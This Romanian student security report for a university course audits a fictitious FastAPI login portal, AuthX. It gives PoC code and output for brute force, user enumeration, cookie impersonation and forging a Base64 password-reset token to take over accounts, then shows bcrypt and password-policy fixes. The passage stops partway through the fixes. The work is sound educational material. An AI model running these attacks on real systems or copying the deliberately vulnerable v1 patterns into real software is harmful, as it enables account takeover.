================================================================================
        RAPORT DE SECURITATE – PROIECT #2: BREAK THE LOGIN
        Curs: Dezvoltarea Aplicatiilor Software Securizate
        Facultatea de Matematica si Informatica, Universitatea din Bucuresti
        Conf. Univ. Dr. Marius Iulian Mihailescu
================================================================================

        Aplicatie: AuthX – Internal Access Portal
        Student: [Numele Studentului]
        Data: 30 Aprilie 2026
        Versiuni: v1 (vulnerabil – main.py) | v2 (securizat – main_secure.py)

================================================================================


================================================================================
1. INTRODUCERE
================================================================================

1.1 Scopul raportului
--------------------------------------------------------------------------------

Prezentul raport documenteaza procesul complet de analiza de securitate
efectuat asupra aplicatiei web AuthX, realizata in cadrul Proiectului #2 din
cursul „Dezvoltarea Aplicatiilor Software Securizate". Raportul acopera atat
rolul de Security Tester (identificarea si demonstrarea practica a
vulnerabilitatilor), cat si rolul de Developer (implementarea fix-urilor si
validarea lor).

Auditul se concentreaza exclusiv pe mecanismele de autentificare:
  - Inregistrare utilizatori (Register)
  - Autentificare (Login)
  - Gestionarea sesiunilor (Cookies / Tokens)
  - Resetarea parolei (Forgot Password)
  - Politica de parole

1.2 Descrierea aplicatiei
--------------------------------------------------------------------------------

AuthX este un portal intern fictiv utilizat de angajatii companiei „AuthX"
pentru accesarea resurselor sensibile. Aplicatia expune un API REST construit
cu framework-ul FastAPI (Python) si utilizeaza o baza de date SQLite locala.

Fluxul principal al aplicatiei:
  1. Un utilizator nou acceseaza /register si creaza un cont (email + parola).
  2. Utilizatorul se autentifica la /login cu credentialele create.
  3. La autentificare cu succes, serverul emite un cookie de sesiune.
  4. Cookie-ul este inclus automat in fiecare request ulterior, permitand
     accesul la /dashboard.
  5. La /logout sesiunea este invalidata si cookie-ul sters.
  6. Daca utilizatorul uita parola, poate solicita un link de resetare la
     /request-reset. Linkul contine un token unic care permite setarea
     unei parole noi la /reset-password.

1.3 Arhitectura aplicatiei
--------------------------------------------------------------------------------

  ┌─────────────────────────────────────────────────────────────────────┐
  │                         CLIENT (Browser)                            │
  │   login.html / register.html / dashboard.html / reset_password.html │
  └─────────────────────┬───────────────────────────────────────────────┘
                        │  HTTP (JSON + Cookie)
                        ▼
  ┌─────────────────────────────────────────────────────────────────────┐
  │                    BACKEND – FastAPI (Python)                        │
  │   Endpoints:                                                         │
  │     GET  /           → login.html                                   │
  │     POST /login      → autentificare                                 │
  │     GET  /register   → register.html                                │
  │     POST /register   → creare cont                                   │
  │     POST /logout     → invalidare sesiune                           │
  │     GET  /dashboard  → pagina protejata                             │
  │     POST /request-reset → generare token resetare                   │
  │     POST /reset-password → setare parola noua                       │
  └─────────────────────┬───────────────────────────────────────────────┘
                        │  sqlite3
                        ▼
  ┌─────────────────────────────────────────────────────────────────────┐
  │                    DATABASE – SQLite                                 │
  │   Tabele: users, sessions, reset_tokens, audit_logs, tickets        │
  └─────────────────────────────────────────────────────────────────────┘

Schema bazei de date (relevanta pentru autentificare):

  Tabel users:
    id              INTEGER PRIMARY KEY AUTOINCREMENT
    email           TEXT UNIQUE NOT NULL
    password_hash   TEXT NOT NULL
    salt            TEXT DEFAULT ''
    role            TEXT DEFAULT 'USER'
    created_at      TIMESTAMP DEFAULT CURRENT_TIMESTAMP
    locked          BOOLEAN DEFAULT 0
    failed_attempts INTEGER DEFAULT 0
    lockout_until   TIMESTAMP

  Tabel sessions:
    id              INTEGER PRIMARY KEY AUTOINCREMENT
    user_id         INTEGER NOT NULL (FK → users.id)
    session_token   TEXT UNIQUE NOT NULL
    created_at      TIMESTAMP DEFAULT CURRENT_TIMESTAMP
    expires_at      TIMESTAMP NOT NULL
    ip_address      TEXT
    user_agent      TEXT

  Tabel reset_tokens:
    id              INTEGER PRIMARY KEY AUTOINCREMENT
    email           TEXT NOT NULL
    token           TEXT UNIQUE NOT NULL
    created_at      TIMESTAMP DEFAULT CURRENT_TIMESTAMP
    expires_at      TIMESTAMP

  Tabel audit_logs:
    id              INTEGER PRIMARY KEY AUTOINCREMENT
    user_id         INTEGER (FK → users.id)
    action          TEXT NOT NULL
    resource        TEXT
    timestamp       TIMESTAMP DEFAULT CURRENT_TIMESTAMP
    ip_address      TEXT

Stack tehnologic:
  - Limbaj: Python 3.12
  - Framework web: FastAPI 0.136+
  - Server ASGI: Uvicorn 0.27+
  - Baza de date: SQLite 3 (fisier local ./db/database.db)
  - Hashing parole v1: MD5 (hashlib, fara salt)
  - Hashing parole v2: bcrypt 5.0 (cu salt automat)
  - Frontend: HTML5 + JavaScript (Fetch API)
  - Sistem de operare: Ubuntu/Debian Linux


================================================================================
2. SETUP MEDIU DE LUCRU
================================================================================

2.1 Cerinte sistem
--------------------------------------------------------------------------------

  - OS: Linux (Ubuntu 22.04+ / Debian 12+) sau Windows cu WSL2
  - Python: versiunea 3.10 sau mai noua
  - pip: inclus cu Python
  - curl sau Postman: pentru testare manuala a endpoint-urilor
  - SQLite3: inclus implicit cu Python

2.2 Instalare dependinte
--------------------------------------------------------------------------------

Pasul 1: Clonarea proiectului sau extragerea arhivei

  $ cd ~
  $ mkdir DAS && cd DAS
  # (copiati fisierele proiectului in acest director)

Pasul 2: Instalarea pachetelor Python necesare

  $ pip install bcrypt fastapi uvicorn --break-system-packages

  Pachete instalate:
    - fastapi 0.136.1     – framework web async de tip REST
    - uvicorn 0.27.1      – server ASGI pentru FastAPI
    - bcrypt 5.0.0        – hashing securizat de parole
    - pydantic 2.13.3     – validare date de intrare (inclus cu FastAPI)
    - starlette 1.0.0     – layer HTTP (inclus cu FastAPI)

Pasul 3: Initializarea bazei de date

  $ cd db
  $ python3 init_db.py
  → Output asteptat: „Baza de date si tabelele au fost create cu succes!"
  $ cd ..

  Scriptul init_db.py executa urmatoarele operatii:
    - Sterge tabelele existente (DROP TABLE IF EXISTS)
    - Creeaza tabelele: users, tickets, audit_logs, sessions, reset_tokens
    - Aplica constrangerile de cheie straina si constrangerile UNIQUE

Pasul 4: Pornirea serverului v1 (vulnerabil) – portul 8000

  $ uvicorn main:app --port 8000 --reload

Pasul 5: Pornirea serverului v2 (securizat) – portul 8001

  $ uvicorn main_secure:app --port 8001 --reload

Pasul 6: Verificare functionare

  $ curl -s http://127.0.0.1:8000/ -o /dev/null -w "v1 HTTP: %{http_code}\n"
  $ curl -s http://127.0.0.1:8001/ -o /dev/null -w "v2 HTTP: %{http_code}\n"
  → Ambele trebuie sa returneze HTTP 200.

2.3 Structura proiectului
--------------------------------------------------------------------------------

  DAS/
  ├── main.py                  ← Backend v1 (vulnerabil)
  ├── main_secure.py           ← Backend v2 (securizat)
  ├── poc.py                   ← Script Proof of Concept (toate 6 teste)
  ├── db/
  │   ├── init_db.py           ← Initializare schema SQLite
  │   └── database.db          ← Fisierul bazei de date (generat la rulare)
  └── html/
      ├── login.html           ← Pagina login v1
      ├── login_secure.html    ← Pagina login v2
      ├── register.html        ← Pagina register v1
      ├── register_secure.html ← Pagina register v2
      ├── dashboard.html       ← Dashboard (dupa login)
      └── reset_password.html  ← Pagina resetare parola


================================================================================
3. IMPLEMENTARE MVP – MECANISMUL DE AUTENTIFICARE
================================================================================

3.1 Inregistrare utilizator (Register)
--------------------------------------------------------------------------------

Endpoint: POST /register
Request body (JSON):  { "email": "user@example.com", "password": "parola" }

Comportament v1 (vulnerabil):
  1. Primeste email si parola de la client.
  2. Verifica unicitatea email-ului in tabela users (SELECT WHERE email = ?).
  3. Calculeaza hash-ul parolei cu MD5 (fara salt): hashlib.md5(pwd.encode()).hexdigest()
  4. Insereaza inregistrarea in tabela users.
  5. Nu valideaza lungimea sau complexitatea parolei.
  6. Returneaza { "message": "Utilizator inregistrat cu succes!" }

Fragment cod v1 (main.py):

    password_hash = hashlib.md5(user.password.encode()).hexdigest()
    db.execute(
        "INSERT INTO users (email, password_hash) VALUES (?, ?)",
        (user.email, password_hash)
    )

3.2 Autentificare (Login)
--------------------------------------------------------------------------------

Endpoint: POST /login
Request body (JSON): { "email": "user@example.com", "password": "parola" }

Comportament v1 (vulnerabil):
  1. Cauta utilizatorul in baza de date dupa email.
  2. Daca utilizatorul nu exista → HTTP 404 cu mesaj „User inexistent".
  3. Recalculeaza MD5 al parolei primite si compara cu hash-ul din DB.
  4. Daca parola nu se potriveste → HTTP 401 cu mesaj „Parola gresita".
  5. La succes: seteaza cookie session_id = str(db_user['id']).
     Cookies nu are HttpOnly, nu are Secure, SameSite implicit (lax).
  6. Nu exista limita de incercari.

Fragment cod v1 (main.py):

    if not db_user:
        raise HTTPException(status_code=404, detail="User inexistent")

    password_hash = hashlib.md5(user.password.encode()).hexdigest()

    if db_user['password_hash'] != password_hash:
        raise HTTPException(status_code=401, detail="Parola gresita")

    session_token = f"{db_user['id']}"   # ← Predictibil!
    response.set_cookie(key="session_id", value=session_token)

3.3 Logout
--------------------------------------------------------------------------------

Endpoint: POST /logout (implementat doar in v2)

In v1, nu exista un endpoint de logout. Sesiunile nu sunt stocate
in baza de date in v1. „Sesiunea" este de fapt doar ID-ul utilizatorului
setat ca si cookie, deci nu poate fi invalidata. Cookie-ul ramane valid
pana la expirare sau pana cand browserul il sterge local.

3.4 Resetare parola
--------------------------------------------------------------------------------

Endpoint: POST /request-reset + POST /reset-password

Comportament v1 (vulnerabil):
  1. POST /request-reset cu { "email": "user@example.com" }
  2. Cauta utilizatorul in DB.
  3. Genereaza token = Base64(email) (complet predictibil!).
  4. Salveaza token-ul in tabela reset_tokens FARA data de expirare.
  5. Returneaza link-ul cu token-ul in clear in raspunsul JSON.

  6. POST /reset-password cu { "token": "...", "new_password": "..." }
  7. Verifica daca token-ul exista in DB (fara verificarea expirarii).
  8. Actualizeaza parola cu noul MD5.
  9. NU sterge token-ul! Acesta poate fi reutilizat nelimitat.

3.5 Gestionare sesiuni
--------------------------------------------------------------------------------

In v1, sesiunile sunt simulate prin stocarea ID-ului numeric al
utilizatorului ca valoare a cookie-ului session_id. Nu exista nici
o sesiune reala in baza de date. Orice cerere care include cookie-ul
cu un ID de utilizator valid este considerata autentificata.

In v2, sesiunile sunt gestionate corect:
  - Token generat cu secrets.token_urlsafe(32) (256 biti entropie)
  - Stocat in tabela sessions cu timestamp de expirare (8 ore)
  - Validat la fiecare request prin interogarea DB
  - Sters la logout (invalidate_session)
  - Regenerat la fiecare login (rotatie token)


================================================================================
4. PREZENTAREA VULNERABILITATILOR – DESCRIERE TEHNICA SI OWASP MAPPING
================================================================================

4.1 Politica de parola slaba (Weak Password Policy)
--------------------------------------------------------------------------------

Descriere tehnica:
  Aplicatia v1 nu impune nicio restrictie asupra parolei la inregistrare.
  Sunt acceptate parole de un singur caracter, parole comune sau complet
  lipsite de complexitate. Practic, orice sir de caractere trece validarea.

OWASP Mapping:
  - A07:2021 – Identification and Authentication Failures
  - CWE-521: Weak Password Requirements

Risc: INALT
  Utilizatorii cu parole slabe sunt vulnerabili la atacuri de tip
  brute force, dictionary attack si credential stuffing.

Dovada: Inregistrare cu parola "a" (1 caracter):

  REQUEST:
    POST http://127.0.0.1:8000/register
    Content-Type: application/json
    { "email": "test@authx.local", "password": "a" }

  RESPONSE (HTTP 200 OK):
    { "message": "Utilizator inregistrat cu succes!" }

  Observatie: Serverul accepta parola fara nicio validare.

4.2 Stocare nesigura a parolelor – MD5 fara salt
--------------------------------------------------------------------------------

Descriere tehnica:
  Parolele sunt stocate in baza de date ca hash-uri MD5 (Message Digest 5)
  fara salt. MD5 este un algoritm criptografic RUPT, inadecvat pentru
  stocarea parolelor din urmatoarele motive:
    - Exista tabele rainbow precalculate pentru milioane de parole comune.
    - Un GPU modern poate calcula MILIARDE de hash-uri MD5 pe secunda.
    - Fara salt, doi utilizatori cu aceeasi parola au hash-uri identice,
      permitand atacurile de corelatie.

OWASP Mapping:
  - A02:2021 – Cryptographic Failures
  - CWE-916: Use of Password Hash With Insufficient Computational Effort
  - CWE-759: Use of a One-Way Hash without a Salt

Risc: CRITIC
  Daca un atacator obtine acces la fisierul bazei de date (prin SQL
  Injection, acces fizic, backup nesecurizat etc.), poate recupera
  parolele in text clar aproape instantaneu folosind site-uri de tipul
  crackstation.net sau hashcat cu tabele rainbow.

Dovada – hash MD5 al parolei „password" in DB:

  Hash stocat in DB: 5f4dcc3b5aa765d61d8327deb882cf99

  Verificare locala:
    >>> import hashlib
    >>> hashlib.md5(b"password").hexdigest()
    '5f4dcc3b5aa765d61d8327deb882cf99'

  Acelasi hash apare pentru toti utilizatorii cu parola „password",
  demonstrand lipsa salt-ului si permitand atacuri de corelatie.

4.3 Brute Force / Lipsa rate limiting
--------------------------------------------------------------------------------

Descriere tehnica:
  Endpoint-ul POST /login din v1 nu limiteaza numarul de incercari de
  autentificare. Un atacator poate trimite un numar nelimitat de cereri
  cu parole diferite fara nicio penalizare sau intarziere.

OWASP Mapping:
  - A07:2021 – Identification and Authentication Failures
  - CWE-307: Improper Restriction of Excessive Authentication Attempts

Risc: INALT
  Combinat cu politica de parola slaba (4.1), atacul devine extrem de
  eficient. Un atacator poate sparge un cont in secunde daca parola
  este in top 1000 parole comune.

Dovada – 6 cereri consecutive fara blocare:

  REQUEST 1: POST /login { "email": "admin@authx.local", "password": "123456" }
  RESPONSE: HTTP 401 – { "detail": "Parola gresita" }

  REQUEST 2: POST /login { "email": "admin@authx.local", "password": "12345678" }
  RESPONSE: HTTP 401 – { "detail": "Parola gresita" }

  REQUEST 3: POST /login { "email": "admin@authx.local", "password": "admin" }
  RESPONSE: HTTP 401 – { "detail": "Parola gresita" }

  REQUEST 4: POST /login { "email": "admin@authx.local", "password": "authx123" }
  RESPONSE: HTTP 401 – { "detail": "Parola gresita" }

  REQUEST 5: POST /login { "email": "admin@authx.local", "password": "parola1" }
  RESPONSE: HTTP 401 – { "detail": "Parola gresita" }

  REQUEST 6: POST /login { "email": "admin@authx.local", "password": "password" }
  RESPONSE: HTTP 200 – { "message": "Login reusit!" }
  Set-Cookie: session_id=1; Path=/; SameSite=lax

  Observatie: 6 incercari, nicio blocare, parola descoperita.

4.4 User Enumeration – Mesaje de eroare diferentiate
--------------------------------------------------------------------------------

Descriere tehnica:
  Endpoint-ul POST /login returneaza mesaje de eroare diferite in functie
  de motivul esecului:
    - HTTP 404 cu "User inexistent"  → daca email-ul nu exista in DB
    - HTTP 401 cu "Parola gresita"  → daca email-ul exista dar parola e gresita

  Aceasta diferenta permite unui atacator sa determine cu certitudine
  care adrese de email sunt inregistrate in sistem, fara a cunoaste parola.

OWASP Mapping:
  - A07:2021 – Identification and Authentication Failures
  - CWE-204: Observable Response Discrepancy

Risc: MEDIU (amplificator pentru alte atacuri)
  Prin enumerarea utilizatorilor, atacatorul poate construi o lista
  precisa de tinte valide pentru atacuri de brute force sau phishing.

Dovada:

  Test cu email INEXISTENT:
  REQUEST: POST /login { "email": "inexistent@authx.local", "password": "orice" }
  RESPONSE: HTTP 404 – { "detail": "User inexistent" }

  Test cu email EXISTENT (parola gresita):
  REQUEST: POST /login { "email": "admin@authx.local", "password": "orice" }
  RESPONSE: HTTP 401 – { "detail": "Parola gresita" }

  Concluzie: doar din codurile HTTP (404 vs 401) si mesajele text,
  atacatorul stie ca admin@authx.local EXISTA in baza de date.

4.5 Gestionare nesigura a sesiunilor
--------------------------------------------------------------------------------

Descriere tehnica:
  Sesiunea in v1 este implementata ca un simplu cookie cu valoarea egala
  cu ID-ul numeric al utilizatorului in baza de date. Exista multiple
  probleme:

  a) Predictibilitate: cookie-ul session_id=1 inseamna utilizatorul cu
     id=1. Un atacator poate impersona orice utilizator setand manual
     cookie-ul la 2, 3, 4, etc.

  b) Lipsa HttpOnly: cookie-ul poate fi accesat din JavaScript front-end
     via document.cookie, permitand furtul sesiunii prin atacuri XSS
     (Cross-Site Scripting).

  c) Lipsa SameSite=Strict: cookie-ul este trimis automat in cereri
     initiate din alte domenii, permitand atacuri CSRF.

  d) Durata excesiva: fara mecanisme de expirare, sesiunea ramane valida
     indefinit dupa logout (deoarece nu exista logout in v1).

OWASP Mapping:
  - A07:2021 – Identification and Authentication Failures
  - A01:2021 – Broken Access Control (impersonare prin predictibilitate)
  - CWE-539: Use of Persistent Cookies Containing Sensitive Information
  - CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag

Risc: CRITIC

Dovada – Header Set-Cookie returnat de v1 la login:

  RESPONSE HEADERS la POST /login (v1):
    HTTP/1.1 200 OK
    Set-Cookie: session_id=1; Path=/; SameSite=lax

  Probleme observabile imediat:
    - Valoarea "1" este ID-ul numeric al utilizatorului.
    - Lipseste "HttpOnly" → document.cookie functioneaza.
    - Lipseste "Secure"   → cookie trimis si pe HTTP (nu doar HTTPS).
    - SameSite=lax (nu strict) → vulnerabil partial la CSRF.

4.6 Resetare parola nesigura
--------------------------------------------------------------------------------

Descriere tehnica:
  Mecanismul de resetare a parolei din v1 are trei vulnerabilitati critice:

  Vulnerabilitatea A – Token predictibil:
    Token-ul de resetare este calculat ca Base64 al adresei de email:
      token = base64.urlsafe_b64encode(email.encode()).decode().rstrip('=')
    Orice atacator care cunoaste adresa de email a victimei (aflata
    prin user enumeration – vuln 4.4) poate calcula tokenul fara
    a interactiona cu serverul de resetare.

  Vulnerabilitatea B – Fara expirare:
    Token-ul este salvat in tabela reset_tokens fara un timestamp de
    expirare valid. Un token generat acum 2 ani este inca acceptat.

  Vulnerabilitatea C – Token reutilizabil:
    Dupa utilizarea token-ului pentru resetarea parolei, acesta nu este
    sters din baza de date. Poate fi folosit de mai multe ori.

OWASP Mapping:
  - A07:2021 – Identification and Authentication Failures
  - CWE-640: Weak Password Recovery Mechanism for Forgotten Password
  - CWE-330: Use of Insufficiently Random Values

Risc: CRITIC
  Combinand user enumeration (4.4) cu tokenul predictibil (4.6A),
  un atacator poate prelua orice cont fara a cunoaste parola si fara
  ca victima sa initieze o resetare.


================================================================================
5. DEMONSTRARE ATAC (PROOF OF CONCEPT)
================================================================================

Scriptul poc.py automatizeaza toate demonstratiile. Se ruleaza astfel:

  Impotriva v1 (vulnerabil):  python3 poc.py
  Impotriva v2 (securizat):   python3 poc.py v2

5.1 PoC 4.1 – Acceptare parola slaba
--------------------------------------------------------------------------------

Cod relevant din poc.py:

    weak_passwords = ["a", "123", "abc123", "password"]
    for pwd in weak_passwords:
        email = f"weaktest_{pwd}@authx.local"
        r = requests.post(f"{base_url}/register",
                          json={"email": email, "password": pwd})
        if r.status_code == 200:
            print(f"[!!!] VULNERABIL: Parola '{pwd}' ACCEPTATA!")

Output v1 (VULNERABIL):
  [!!!] VULNERABIL (v1): Parola 'a' a fost ACCEPTATA!
  [!!!] VULNERABIL (v1): Parola '123' a fost ACCEPTATA!
  [!!!] VULNERABIL (v1): Parola 'abc123' a fost ACCEPTATA!
  [!!!] VULNERABIL (v1): Parola 'password' a fost ACCEPTATA!

Output v2 (SECURIZAT):
  [+] SECURIZAT (v2): Parola 'a' a fost RESPINSA (politica parola).
  [+] SECURIZAT (v2): Parola '123' a fost RESPINSA (politica parola).
  [+] SECURIZAT (v2): Parola 'abc123' a fost RESPINSA (politica parola).
  [+] SECURIZAT (v2): Parola 'password' a fost RESPINSA (politica parola).

5.2 PoC 4.2 – Cracking MD5 direct din DB
--------------------------------------------------------------------------------

Cod relevant din poc.py:

    conn = sqlite3.connect("./db/database.db")
    cursor = conn.cursor()
    cursor.execute("SELECT email, password_hash FROM users LIMIT 5")
    for row in cursor.fetchall():
        h = row['password_hash']
        if len(h) == 32:  # MD5
            print(f"[!!!] VULNERABIL: {row['email']} → hash MD5: {h}")
            if h == hashlib.md5(b"password").hexdigest():
                print(f"      Cracat instant! Parola: 'password'")

Output v1 (VULNERABIL):
  [!!!] VULNERABIL (v1): admin@authx.local → hash MD5: 5f4dcc3b5aa765d61d8327deb882cf99
        Cracat instant! Parola originala: 'password'
  [!!!] VULNERABIL (v1): victim@authx.local → hash MD5: 5f4dcc3b5aa765d61d8327deb882cf99
        Cracat instant! Parola originala: 'password'

Observatie: hash-urile identice confirma lipsa salt-ului.

Output v2 (SECURIZAT):
  [+] SECURIZAT (v2): admin@authx.local → hash bcrypt: $2b$12$VzBI57uiG48fm.lJ97/SvO...
  [+] SECURIZAT (v2): victim@authx.local → hash bcrypt: $2b$12$KtrfaX0d1bV0Qsbixb...

Observatie: hash-uri diferite pentru aceeasi parola (salt unic per user),
prefix $2b$ confirma algoritmul bcrypt cu work factor 12.

5.3 PoC 4.3 – Brute Force fara blocare
--------------------------------------------------------------------------------

Cod relevant din poc.py:

    for pwd in ["123456","12345678","admin","authx123","parola1","password"]:
        r = requests.post(f"{base_url}/login",
                          json={"email": email, "password": pwd})
        if r.status_code == 200:
            print(f"[!!!] VULNERABIL: Parola gasita: '{pwd}'! Nicio blocare.")
            return
        elif r.status_code == 429 or "blocat" in r.text.lower():
            print(f"[+] SECURIZAT: Cont BLOCAT dupa prea multe incercari!")
            return

Output v1 (VULNERABIL):
  [4.3] Test: Brute Force
  Incercare '123456': 401
  Incercare '12345678': 401
  Incercare 'admin': 401
  Incercare 'authx123': 401
  Incercare 'parola1': 401
  [!!!] VULNERABIL (v1): Parola gasita: 'password'! Nicio blocare detectata.

Output v2 (SECURIZAT):
  [4.3] Test: Brute Force
  Incercare '123456': 401
  Incercare '12345678': 401
  Incercare 'admin': 401
  Incercare 'authx123': 401
  Incercare 'parola1': 401
  [+] SECURIZAT (v2): Cont BLOCAT dupa prea multe incercari!
  Raspuns: Cont blocat pana la 12:41:56. Prea multe incercari esuate.

5.4 PoC 4.4 – User Enumeration
--------------------------------------------------------------------------------

Cod relevant din poc.py:

    for email, label in [("admin@authx.local","EXISTENT"),
                          ("inexistent@authx.local","INEXISTENT")]:
        r = requests.post(f"{base_url}/login",
                          json={"email": email, "password": "parolaGresita!99"})
        detail = r.json().get("detail", "")
        if "inexistent" in detail.lower() or "parol" in detail.lower():
            print(f"[!!!] VULNERABIL: user {label} → mesaj diferit: '{detail}'")
        elif "credentiale invalide" in detail.lower():
            print(f"[+] SECURIZAT: user {label} → mesaj generic: '{detail}'")

Output v1 (VULNERABIL):
  [!!!] VULNERABIL: user EXISTENT (admin@authx.local) → mesaj: 'Parola gresita'
  [!!!] VULNERABIL: user INEXISTENT (inexistent@authx.local) → mesaj: 'User inexistent'

Output v2 (SECURIZAT):
  [+] SECURIZAT: user EXISTENT → mesaj generic: 'Credentiale invalide'
  [+] SECURIZAT: user INEXISTENT → mesaj generic: 'Credentiale invalide'

5.5 PoC 4.5 – Impersonare prin cookie predictibil
--------------------------------------------------------------------------------

Cod relevant din poc.py:

    s = requests.Session()
    r = s.post(f"{base_url}/login", json={"email": email, "password": pwd})
    cookie = s.cookies.get("session_id")
    try:
        user_id = int(cookie)
        print(f"[!!!] VULNERABIL: Cookie = ID numeric ({user_id})!")
        print(f"      Oricine poate impersona alt user cu cookie '2','3', etc.")
    except ValueError:
        print(f"[+] SECURIZAT: Cookie este un token random opac.")

Output v1 (VULNERABIL):
  Cookie session_id: 1...
  [!!!] VULNERABIL (v1): Cookie = ID numeric al utilizatorului (1)!
        Oricine poate impersona alt user schimband cookie-ul la '2', '3', etc.
  Set-Cookie: session_id=1; Path=/; SameSite=lax
  [!!!] VULNERABIL (v1): Cookie fara HttpOnly → accesibil din JS (risc XSS)!

Output v2 (SECURIZAT):
  Cookie session_id: Fe7JL9a4XjdH7YD9-Ozqm5hQjKztjRXdeaSNB_Q4jKo...
  [+] SECURIZAT: Cookie este un token random opac (nu ID numeric).
  Set-Cookie: session_id=...; HttpOnly; Max-Age=28800; Path=/; SameSite=strict
  [+] SECURIZAT: Cookie are atribut HttpOnly.
  [+] SECURIZAT: Cookie are atribut SameSite.

5.6 PoC 4.6 – Token de resetare predictibil si reutilizabil
--------------------------------------------------------------------------------

(A) Token predictibil:

Cod relevant din poc.py:

    requests.post(f"{base_url}/request-reset", json={"email": email})
    fake_token = base64.urlsafe_b64encode(email.encode()).decode().rstrip('=')
    r = requests.post(f"{base_url}/reset-password",
                      json={"token": fake_token, "new_password": "HackedPassword123!"})
    if r.status_code == 200:
        print("[!!!] VULNERABIL: Serverul a ACCEPTAT tokenul Base64! Cont preluat!")

Output v1 (VULNERABIL):
  Token ghicit (Base64 email): dmljdGltQGF1dGh4LmxvY2Fs
  [!!!] VULNERABIL (v1): Serverul a ACCEPTAT tokenul Base64! Cont preluat!

Output v2 (SECURIZAT):
  Token ghicit (Base64 email): dmljdGltQGF1dGh4LmxvY2Fs
  [+] SECURIZAT (v2): Serverul a RESPINS tokenul fabricat (token random).

(B) Token reutilizabil:

Output v1 (VULNERABIL):
  Token obtinut: dG9rZW50ZXN0QGF1dGh4LmxvY2Fs...
  Prima resetare: REUSITA
  [!!!] VULNERABIL (v1): Token REUTILIZABIL! A doua resetare a reusit!

Output v2 (SECURIZAT):
  Token obtinut: sHRwYyER2x3URIbolXWNhip__dasM5...
  Prima resetare: REUSITA
  [+] SECURIZAT (v2): Token one-time! A doua utilizare a fost RESPINSA.


================================================================================
6. ANALIZA IMPACT
================================================================================

6.1 Impact per vulnerabilitate
--------------------------------------------------------------------------------

Vulnerabilitate 4.1 – Politica parola slaba:
  Ce poate obtine atacatorul:
    - Acces la conturi protejate de parole simple prin dictionary attack.
    - Compromitere masiva in cazul unui atac de tip credential stuffing
      (reutilizare parole din alte breach-uri).
  Scenariu real: atacatorul construieste o lista cu parole comuni si
  ruleaza un script automat. La 10 req/s (modest), incearca 864.000
  de parole pe zi, fara nicio limitare in v1.

Vulnerabilitate 4.2 – MD5 fara salt:
  Ce poate obtine atacatorul:
    - La obtinerea fisierului database.db, poate recupera TOATE parolele
      in interval de minute-ore cu un GPU obisnuit.
    - Crackstation.net (hash rainbow table public) spargeinstant
      hash-ul MD5 al „password": 5f4dcc3b5aa765d61d8327deb882cf99.
    - Hash-urile identice (lipsa salt) dezvaluie toti utilizatorii
      cu aceeasi parola dintr-o singura privire.
    - Impact: compromitere totala a bazei de date de utilizatori,
      inclusiv potential password reuse pe alte platforme.

Vulnerabilitate 4.3 – Brute Force:
  Ce poate obtine atacatorul:
    - Acces la orice cont pentru care stie email-ul si are timp suficient.
    - Cu Hydra sau Burp Intruder: sute de incercari pe secunda.
    - Conturile administrative sunt tinte prioritare (admin@authx.local).

Vulnerabilitate 4.4 – User Enumeration:
  Ce poate obtine atacatorul:
    - Lista completa de utilizatori activi in sistem.
    - Date de contact (emailuri) pentru campanii de phishing tintit.
    - Tinte valide pentru atacurile 4.1 si 4.3.

Vulnerabilitate 4.5 – Sesiuni nesigure:
  Ce poate obtine atacatorul:
    - Impersonarea oricarui utilizator cunoscand ID-ul sau numeric.
    - Prin XSS intr-o pagina terta: furt de cookie prin document.cookie.
    - Mentinerea accesului dupa ce utilizatorul legitim a „iesit" din cont.
    - Acces la resurse sensibile sau efectuare de actiuni in numele victimei.

Vulnerabilitate 4.6 – Reset token nesigur:
  Ce poate obtine atacatorul:
    - Preluarea completa a oricarui cont cunoscand doar adresa de email.
    - Atacul nu necesita interactiunea victimei (nu trebuie sa dea click
      pe un link malitios).
    - Schimbarea parolei victimei fara ca aceasta sa realizeze imediat.
    - Combinand 4.4 + 4.6: enumerare useri → calcul token → preluare cont.

6.2 Scenariul de atac complet (attack chain)
--------------------------------------------------------------------------------

Un atacator care ataca AuthX v1 poate parcurge urmatorii pasi:

  Pasul 1 (Recunoastere – Vuln 4.4):
    Prin user enumeration, confirma ca admin@authx.local exista.

  Pasul 2 (Calcul token – Vuln 4.6A):
    Calculeaza baza64 pt email-ul gasit. Nu necesita interactiunea cu
    endpoint-ul /request-reset.
    token = base64("admin@authx.local") = YWRtaW5AYXVfaHgubG9jYWw

  Pasul 3 (Preluare cont – Vuln 4.6A):
    Trimite POST /reset-password cu token-ul calculat si o parola noua.
    Contul admin este acum sub controlul atacatorului.

  Pasul 4 (Mentinerea accesului – Vuln 4.5 + 4.6C):
    Sesiunea veche a adminului este inca valida (ID numeric).
    Token-ul de resetare nu a fost sters, poate fi reutilizat oricand.
    Atacatorul genereaza un token nou, il salveaza pentru acces viitor.

  Durata totala a atacului: sub 30 de secunde cu un script simplu.
  Cunostinte necesare: adresa de email a victimei.
  Detectabilitate in v1: ZERO (nu exista logging sau rate limiting).


================================================================================
7. IMPLEMENTAREA FIX-URILOR (v2 – main_secure.py)
================================================================================

7.1 FIX 4.1 – Politica de parola
--------------------------------------------------------------------------------

Implementare (main_secure.py):

    def validate_password_strength(password: str) -> bool:
        if len(password) < 8:
            return False
        if not re.search(r'[A-Z]', password):  # cel putin o litera mare
            return False
        if not re.search(r'[a-z]', password):  # cel putin o litera mica
            return False
        if not re.search(r'\d', password):       # cel putin o cifra
            return False
        if not re.search(r'[!@#$%^&*()\-_=+\[\]{};:\'",.<>/?\\|`~]', password):
            return False                          # cel putin un caracter special
        return True

Utilizare in /register si /reset-password:

    if not validate_password_strength(user.password):
        raise HTTPException(
            status_code=400,
            detail="Parola trebuie sa aiba minim 8 caractere, cel putin o litera mare, "
                   "o litera mica, o cifra si un caracter special."
        )

Cerinte impuse: minim 8 caractere | litera mare | litera mica | cifra |
                caracter special din setul: !@#$%^&*()-_=+[]{}...

7.2 FIX 4.2 – Hash bcrypt cu salt
--------------------------------------------------------------------------------

Implementare (main_secure.py):

    import bcrypt

    def hash_password(password: str) -> str:
        # bcrypt.gensalt() genereaza un salt unic 128-bit
        # work factor implicit: 12 (2^12 = 4096 iteratii)
        return bcrypt.hashpw(
            password.encode('utf-8'),
            bcrypt.gensalt()
        ).decode('utf-8')

    def verify_password(password: str, stored_hash: str) -> bool:
        return bcrypt.checkpw(
            password.encode('utf-8'),
            stored_hash.encode('utf-8')
        )

Diferente fata de MD5:
  - bcrypt include salt-ul in hash (format: $2b$12$<22 car. salt><31 car. hash>)
  - Calculul unui hash dureaza ~100ms pe CPU (impractical pentru brute force)
